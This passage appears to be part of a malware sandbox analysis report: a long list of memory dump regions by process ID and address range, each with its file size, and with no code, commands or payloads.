                                                                                                                                                          • memory/1956-246-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1956-255-0x0000000003220000-0x000000000322C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            48KB

                                                                                                                                                          • memory/1960-266-0x0000000004F10000-0x0000000004F11000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1960-251-0x00000000006A0000-0x00000000006A1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1960-260-0x00000000027A0000-0x00000000027A1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1960-264-0x0000000004E70000-0x0000000004EB9000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            292KB

                                                                                                                                                          • memory/1960-303-0x000000000E780000-0x000000000E781000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1960-280-0x00000000050B0000-0x00000000050B1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1960-298-0x000000000E080000-0x000000000E081000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2024-228-0x0000000005870000-0x0000000005871000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2024-216-0x0000000005360000-0x0000000005361000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2024-214-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2024-204-0x0000000000920000-0x0000000000921000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2024-208-0x0000000005140000-0x0000000005141000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2124-338-0x0000000001170000-0x0000000001185000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            84KB

                                                                                                                                                          • memory/2124-759-0x0000000004B70000-0x0000000004B85000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            84KB

                                                                                                                                                          • memory/2324-231-0x0000000002DA0000-0x0000000002E4E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            696KB

                                                                                                                                                          • memory/2324-249-0x0000000000400000-0x0000000002D9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            41.6MB

                                                                                                                                                          • memory/2344-639-0x0000022132900000-0x0000022132972000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/2364-674-0x000001AC4E600000-0x000001AC4E672000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/2516-250-0x0000000000400000-0x0000000002DBC000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            41.7MB

                                                                                                                                                          • memory/2516-230-0x0000000002DC0000-0x0000000002F0A000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.3MB

                                                                                                                                                          • memory/2516-189-0x00000000030A9000-0x00000000030D1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            160KB

                                                                                                                                                          • memory/2568-647-0x0000011BEE500000-0x0000011BEE572000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/2676-709-0x00000152BD240000-0x00000152BD2B2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/2692-711-0x0000022FD5700000-0x0000022FD5772000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/2788-221-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2888-191-0x0000000002150000-0x0000000002151000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2888-188-0x0000000002150000-0x0000000002151000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3060-644-0x0000025ED5800000-0x0000025ED5872000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/3060-642-0x0000025ED5740000-0x0000025ED578D000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            308KB

                                                                                                                                                          • memory/3212-489-0x0000000005130000-0x00000000051DB000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            684KB

                                                                                                                                                          • memory/3592-651-0x000002645AB70000-0x000002645ABE2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/3592-727-0x000002645C390000-0x000002645C3BB000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            172KB

                                                                                                                                                          • memory/3592-728-0x000002645D200000-0x000002645D306000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                          • memory/3692-220-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            80KB

                                                                                                                                                          • memory/3704-631-0x0000000004F40000-0x0000000004F41000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3704-632-0x0000000004F43000-0x0000000004F45000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/3992-203-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            80KB

                                                                                                                                                          • memory/4120-272-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4120-270-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4140-307-0x0000000077080000-0x000000007720E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.6MB

                                                                                                                                                          • memory/4140-351-0x00000000053D0000-0x00000000053D1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4240-315-0x0000000005360000-0x000000000585E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.0MB

                                                                                                                                                          • memory/4240-286-0x0000000000A40000-0x0000000000A41000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4252-342-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4328-350-0x0000000004D20000-0x0000000004D21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4524-752-0x0000000000400000-0x0000000002D9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            41.6MB

                                                                                                                                                          • memory/4524-751-0x0000000002DA0000-0x0000000002E4E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            696KB

                                                                                                                                                          • memory/4536-733-0x0000000000400000-0x0000000000491000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            580KB

                                                                                                                                                          • memory/4612-748-0x0000000004AD2000-0x0000000004AD3000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4612-750-0x0000000004AD4000-0x0000000004AD6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/4612-749-0x0000000004AD3000-0x0000000004AD4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4612-746-0x0000000000400000-0x0000000002B8A000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            39.5MB

                                                                                                                                                          • memory/4612-747-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4612-736-0x00000000001C0000-0x00000000001F0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            192KB

                                                                                                                                                          • memory/4872-406-0x00000000047E0000-0x00000000048BF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            892KB

                                                                                                                                                          • memory/4872-408-0x0000000004900000-0x00000000049AB000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            684KB